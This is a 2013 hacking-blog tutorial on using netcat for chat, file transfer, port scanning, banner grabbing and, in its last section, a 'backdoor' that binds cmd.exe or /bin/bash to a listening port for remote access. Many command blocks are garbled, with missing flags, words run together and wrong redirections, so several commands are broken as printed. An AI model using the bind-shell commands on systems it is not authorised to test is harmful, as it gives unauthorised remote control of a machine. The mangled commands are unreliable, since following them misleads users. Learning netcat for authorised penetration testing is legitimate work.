Advertise

Tuesday 8 October 2013

Hacker's Swiss Army Knife - Netcat for Penetration testers from Scanning to Hacking

This Thread will Discuss Following things :-

 1. What is Netcat ?
2. It's Features .
3. Installation Method's
- Window's Box.
- Linux Box.
4. Netcat One Many Army
- Multiple Tool / Use Name.
5. Netcat as Chat Server.
6. Netcat as File Transfering Application.
7. Netcat as Port Scanning Tool.
8. Netcat as Banner Grabbing Machine.
9. Netcat as Backdoor / Remote Pwning - Granting Access to Create, Edit, Delete and S***.
10. Netcat as System-in-Law Conclusion.
[Image: WVlEI.png]
What is Netcat ?
Netcat is a tool, which can read and write data across any TCP and UDP Network connections, Now, when it has read and write mechanism for any TCP and UDP network connections, we can definitely juice out many stuff...
So, Let's See What it's Feature are :-
Some of Netcat’s features are:
  • Outbound or inbound connections, TCP or UDP, to or from any ports
  • Full DNS forward/reverse checking, with appropriate warnings
  • Ability to use any local source port
  • Ability to use any locally-configured network source address
  • Built-in port-scanning capabilities, with randomizer
  • Built-in loose source-routing capability
  • Can read command line arguments from standard input
  • Slow-send mode, one line every N seconds
  • Hex dump of transmitted and received data
  • Optional ability to let another program service established connections
  • Optional telnet-options responder
this list was listed in vulnwatch.org website which no more exist.

 So, After Getting to know all this feature, you may want to give it a try, so how to get them and Install them.
Installation Method's
Google Search Results for: Download Netcat 
After you have Downloaded , How you can Run them :-

 For Windows :-
- Unzip and Run your netcat.exe or nc.exe file, that's it, 

 For Linux :-
- Unzip and Go to Netcat Directory.
PHP Code:
root@worldofhacker# make root@worldofhacker# make intallorroot@worldofhacker# apt-get install nc*orroot@worldofhacker# yum install nc* 

 That's it, Now I assume you have running netcat with you, so I will take you to Netcat Discovery Channel.

 Netcat is one Alone Tool, that can do multiple Work, and all thos work not limited to are.
Netcat One Man Army
1. Netcat as Chat Server.
2. Netcat as File Transfering Application.
3. Netcat as Port Scanning Tool.
4. Netcat as Banner Grabbing Machine.
5. Netcat as Backdoor/Remote Pwning - Granting Access to Create, Edit, Delete and S***.

 So, Let's Discuss all those Features.
1. Netcat as Chat Server

 System A :-
PHP Code:
c:\> nc.exe -lvp 1234orkrokite@worldofhacker~$ nc -lvp 1234    // This is for linux system 

 System B :-
PHP Code:
c:\> nc [system_A_ip] -vp 1234orkrokite@worldofhacker~$ nc [system_A_ip] -vp 1234  // This is for linux system 
2. Netcat as File Transfering Application.
System A [Receiving the File]
PHP Code:
c:\> nc.exe --p 1234 > worldofhacker.txtorkrokite@worldofhacker~$ nc --p 1234 > worldofhacker.txt 

 System B [Sending the File]
PHP Code:
c:\>nc.exe [system_A_ip] -p 1234 krokite.txtorkrokite@worldofhacker~$ nc [system_A_ip] -p 1234 > krokite.txt 
3. Netcat as Port Scanning Tool.

PHP Code:
c:\> nc.exe -w2 --[target_system_ip1-443or krokite@worldofhacker~$ nc -w2 --[target_system_ip1-443or c:\> nc.exe -w2 --[target_system_ip80,21,20,53,22,,25,110,143,443orkrokite@worldofhacker~$ nc -w2 --[target_system_ip80,21,20,53,22,25,110,143,443 

 w means to wait.
v means verbose mode, that means display the way program is processing.
z is used for scanning purpose [Zero-I/O]
1-443 is port from 1 to 443, you can also specify like 80,81,82,21,22,20,53, etc..
4. Netcat as Banner Grabbing Machine.

PHP Code:
c:\> nc.exe -vvn [target_ip] [port_number]
krokite@worldofhacker~$ nc -vvn [target_ip] [port_number]e.gc:\> nc.exe -vvn 1.1.1.1 80
GET /HTTP 1.0/krokite@worldofhacker~$ nc -vvn 1.1.1.1 80
GET /HTTP 1.0
Press 2 times enter after you send GET Request.

 For port 80 i.e, HTTP Request, you need to send mehod of Request like [GET, PUT, HEAD, etc.,]
you may change port 80 to 21 or any other , than you dont have to type GET request.

 if you want to use domain name instead of ip than remove n from -vvn, just use as -vv
5. Netcat as Backdoor/Remote Pwning
System A
PHP Code:
c:\> nc.exe -lp 1234 -e cmd.exeorkrokite@worldofhacker~$ nc -lp 1234 -/bin/bash 

 System B
PHP Code:
c:\> nc.exe [system_A_ip1234orkrokite@worldofhacker~$ nc [system_A_ip1234 
System in Law - Conclusion

 Hacking is Illegal, But Penetration testing with complete authority is legal. Do not use Given knowledge to attack or Harm any person, if you do so, I [KroKite] or Worldofhacker.com will not be responsible for what you do with this knowedge.

 Thats it. Good Luck

 Search more, explore more.. Here are few google output from my side :-
Resource Center
Google Search Results for: Download netcat
Google Search Results for: Netcat Swiff army knife
Google Search Results for: http://www.jfranken.de/homepages/johannes/vortraege/netcat_inhalt.en.html - Recommended, and there are many more..

 If you find some reply here with the link , will add them in resource center here :-
Copyright © KroKite
Any Question Put them Below.
at
Labels: , , ,
 
World of Hacker © 2011 Creative Commons License
World of Hacker by KroKite is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.
Based on a work at http://www.worldofhacker.com.
Permissions beyond the scope of this license may be available at https://groups.google.com/forum/#!newtopic/hackerforum.